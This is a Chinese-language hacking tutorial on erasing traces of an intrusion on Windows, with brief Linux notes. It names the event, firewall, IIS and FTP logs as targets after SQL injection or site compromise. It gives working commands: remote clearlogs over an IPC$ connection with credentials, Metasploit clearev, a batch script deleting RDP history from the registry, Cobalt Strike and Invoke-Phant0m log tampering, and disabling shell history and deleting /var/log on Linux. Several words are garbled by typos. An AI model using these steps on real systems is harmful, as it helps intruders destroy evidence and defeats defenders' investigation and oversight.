windows入侵痕迹清理
日志清理 为了方便管理员了解掌握电脑的运行状态,Windows提供了完善的日志功能,将系统服务、权限设置、软件运行等相关事件分门别类详细记录于日志之中。所以,通过观察、分析系统日志,有经验的管理员不但可以了解黑客对系统做了哪些改动,甚至还可能会找出入侵的来源,例如从ftp日志找出黑客登录的lP地址。为此,清除日志几乎成为黑客入门的必修课。
WndowsXP操作系统为例,它的日志系统由默认提供的日志、防火墙日志、ns服务器日志三大类组成。
1.默认提供的日志 Windows系统默认提供应用程序日志、安全性日志和系统日志。应用程序主要记录应用程序运行时出现的错误和特效事件。
例如:停止响应、数据启动、停止等。安全性日志用于记录管理员指定的审核事项,假如管理员没有在组策略中指定需要审核的内容及审核的方向,说明此日志为空白状态。
系统日志用于记录各类系统运行的信息。例如Telnet服务启动后,系统日志将会记录该服务启动的时间,并留下一条关elnet服务正处于运行状态的描述。
从以上的分析不难看出,对于没有安装附加组件的"肉鸡"而言,系统日志是清除的首要目标。
2.防火墙日志 防火墙日志默认处于关闭状态,管理员启用了防火墙日志记录功能后,就会在vrindows目录内自动生成pfuwall.log文件,并记录相应的连接内容。假如找不到这个文件,则说明管理员没有启用防火墙日志功能
3.IIS日志 若用户安装了IIS服务器组件,就可以在"%systemroot%\system32\logfles\"中找到FTP、Web、Ils服务器等同志。
服务,对黑客而言,其意义不大。
W3SVCl文件夹用于存放lP地址、用户名、服务器端口、用户所访问的UiRI资源、发出的URI查求等信息,管理员通过分析此文件可以找出黑客入侵的各种痕迹,所以,完成SQL注入、网站挂马等操作后,务必要清除此文件。
MSFTPSVC1文件夹保存着FTP日志,与前面介绍的Web、IIS日志相比,FTP日志更详细,不但包含用户登录操作,还包含用户的各种操作请求,例如记录用户利用UNICODE漏洞入侵服务器,就会留下相当多与cmd.exe有关的记录,所以,在成功入侵后,此日志须及时清除
日志清理
Eventvwr.msc
右键 属性 清楚日志
如果我们不想手工清除,我们可以下载clearlog.exe
使用方法:Usage: clearlogs [\\computername] -app / -sec / -sys
-app = 应用程序日志 -sec = 安全日志 -sys = 系统日志a. 可以清除远程计算机的日志** 先用ipc连接上去: net use \\ip\ipc$ 密码/user:用户名** 然后开始清除: 方法 clearlogs \\ip -app 这个是清除远程计算机的应用程序日志clearlogs \\ip -sec 这个是清除远程计算机的安全日志clearlogs \\ip -sys 这个是清除远程计算机的系统日志
b.清除本机日志: 如果和远程计算机的不能空连接. 那么就需要把这个工具传到远程计算机上面 然后清除. 方法:
clearlogs -app 这个是清除远程计算机的应用程序日志clearlogs -sec 这个是清除远程计算机的安全日志clearlogs -sys 这个是清除远程计算机的系统日志
安全日志已经被清除.Success: The log has been cleared 成功.
破坏Windows日志记录功能
利用工具
· Invoke-Phant0m
· Windwos-EventLog-Bypass
msf
run clearlogs
clearev
3389登陆记录清除
@echo off
@reg delete "HKEY_CURRENT_USER\Software\Microsoft\Terminal Server Client\Default" /va /f
@del "%USERPROFILE%\My Documents\Default.rdp" /a
@exit
Cobaltstricke插件:EventLogMaster-master
查看日志
在cs上线上的机器ClearAll
OK!
虽然这里讲的是windows的痕迹清理,也大概讲下linux的
1:在获取权限后,执行以下命令,不会记录输入过的命令
export HISTFILE=/dev/null export HISTSIZE=0· 1
2:删除 /var/log 目录下的日志文件
3:如果是web应用,找到web日志文件,删除
异曲同工